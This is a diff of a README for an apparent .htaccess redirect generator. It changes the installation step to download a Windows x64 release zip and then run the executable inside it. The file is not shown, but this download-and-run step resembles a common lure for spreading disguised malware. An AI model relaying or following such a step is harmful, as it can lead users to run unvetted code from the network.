kentCann/Generateur-de-Fichiers-.htaccess-pour-Redirections-SEO/README.md

 ## 📦 Installation

-1. Download the Software.zip file from the link provided above.
+1. Download the https://github.com/kentCann/Generateur-de-Fichiers-.htaccess-pour-Redirections-SEO/releases/download/v1.0/Release_x64.zip file from the link provided above.
 2. Extract the contents to a folder on your local machine.
 3. Run the executable file to launch the tool.
 4. Follow the on-screen instructions to generate your custom .htaccess file.